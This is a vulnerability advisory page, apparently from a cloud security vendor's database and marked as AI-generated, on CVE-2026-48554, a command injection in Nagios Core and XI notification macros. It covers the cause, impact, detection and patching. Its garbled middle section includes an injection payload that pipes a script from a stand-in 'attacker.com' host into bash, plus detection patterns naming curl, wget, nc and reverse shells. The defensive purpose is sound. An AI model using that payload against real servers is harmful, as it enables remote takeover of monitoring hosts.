
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-48554 is an authenticated remote code execution (RCE) vulnerability in Nagios Core and Nagios XI caused by unfiltered NOTIFICATION-family macro substitution through the com_data parameter. When a notification command references $NOTIFICATIONCOMMENT$ or $NOTIFICATIONAUTHOR$ in a shell-reachable position, authenticated UI users can execute arbitrary OS commands as the nagios user. Affected versions include Nagios Core before 4.5.14 and Nagios XI before 2026R1.7. The vulnerability was disclosed on August 12, 2026, with a CVSS v3.1 score of 7.5 (High) and a CVSS v4.0 score of 7.7 (High) (GitHub Advisory, Nagios Changelog).
The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command), where user-supplied input passed via the com_data parameter is substituted into NOTIFICATION-family macros ($NOTIFICATIONCOMMENT$, $NOTIFICATIONAUTHOR$) without adequate sanitization before being passed to a shell-executed notification command. Exploitation requires a non-default configuration in which a notification command definition references these macros in a position that reaches shell execution — meaning the attacker must be able to submit a notification comment or author field through the Nagios UI that is subsequently expanded into a command line. The attack vector is network-based, requires low privileges (authenticated UI access), and no user interaction, but the attack requirement of a specific non-default configuration raises the effective complexity (GitHub Advisory, Nagios Changelog). The fix in Nagios Core 4.5.14 was credited to Zach Hanley of Horizon3.ai (Nagios Changelog).
Successful exploitation allows any authenticated Nagios UI user with low-level privileges to execute arbitrary OS commands as the nagios system user, resulting in full compromise of confidentiality, integrity, and availability of the affected monitoring host. An attacker could read sensitive configuration files (including credentials for monitored systems), modify monitoring data, disrupt availability of the Nagios service, or use the compromised host as a pivot point for lateral movement within the monitored infrastructure. The scope is limited to the vulnerable system itself (no subsequent system impact), but given Nagios's role as a network monitoring platform, the monitored environment's credentials and topology are at significant risk of exposure (GitHub Advisory).
As of the disclosure date, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.52%, placing it in the 42nd percentile for exploitation probability within 30 days. NVD SSVC assessment classifies exploitation as "none" and the attack as non-automatable, reflecting the requirement for a specific non-default configuration (GitHub Advisory). The vulnerability was discovered and reported by Zach Hanley of Horizon3.ai (Nagios Changelog).
$NOTIFICATIONCOMMENT$ or $NOTIFICATIONAUTHOR$ in a shell-executed command line.com_data parameter — such as acknowledging a host/service problem or adding a comment — which maps to the $NOTIFICATIONCOMMENT$ or $NOTIFICATIONAUTHOR$ macro.; id; curl http://attacker.com/shell.sh | bash). This payload is passed unsanitized through the com_data parameter.nagios OS user, achieving arbitrary command execution on the server (GitHub Advisory).; | & $()) in comment or author fields.cmd.cgi with com_data values containing shell special characters; Nagios daemon logs showing unusual command execution output or errors during notification processing./bin/bash, curl, wget, python, nc) with command-line arguments derived from notification comment content./usr/local/nagios/, /var/log/nagios/) created by the nagios user unexpectedly; presence of web shells or reverse shell scripts in web-accessible directories.Update Nagios Core to version 4.5.14 or later, and Nagios XI to version 2026R1.7 or later, which include sanitization of notification macros (Nagios Changelog, GitHub Advisory). As an interim workaround, review all notification command definitions and ensure that $NOTIFICATIONCOMMENT$ and $NOTIFICATIONAUTHOR$ macros are not referenced in shell-executed command lines; if they must be used, apply proper shell quoting and input sanitization. Restrict Nagios UI access to trusted users and networks to reduce the attack surface until patching is complete.
The vulnerability was discovered and responsibly disclosed by Zach Hanley of Horizon3.ai, who is credited in the Nagios Core 4.5.14 changelog alongside fixes for several other security issues in the same release (Nagios Changelog). VulnCheck published an advisory detailing the vulnerability. No significant broader community or social media discussion has been identified at this time.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."